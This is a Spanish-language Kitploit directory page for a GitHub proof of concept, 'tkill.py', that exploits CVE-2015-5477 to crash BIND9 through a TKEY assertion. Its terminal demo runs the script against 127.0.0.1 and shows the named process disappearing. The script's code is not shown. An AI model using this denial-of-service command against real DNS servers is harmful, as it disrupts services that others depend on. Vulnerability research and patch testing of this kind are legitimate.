Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2015-5477 — PoC para el DoS por assert de TKEY en BIND9 (CVE-2015-5477) | Kitploit
Herramientas/GitHubGitHub/knqyf263/cve-2015-5477
Análisis de VulnerabilidadesExplotaciónSeguridad de RedesAnálisis de DNS
GitHubknqyf263/cve-2015-5477

cve-2015-5477

PoC para el DoS por assert de TKEY en BIND9 (CVE-2015-5477)

Ver Repositorio
1hace 11 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

cve-2015-5477

PoC para DoS por aserción TKEY en BIND9 (CVE-2015-5477)

root@kitploit:~
$ ps awux | grep -v grep | grep bind
bind      2373  0.0  2.2 141164 13424 ?        Ssl  14:58   0:00 /var/named/chroot/sbin/named -u bind -t /var/named/chroot -c /etc/named.conf
$ python tkill.py 127.0.0.1
Begin emission:
..Finished to send 1 packets.
.......................................................................................................................................................................................................................^C
Received 217 packets, got 0 answers, remaining 1 packets
$ ps awux | grep -v grep | grep bind
$
Descargar herramienta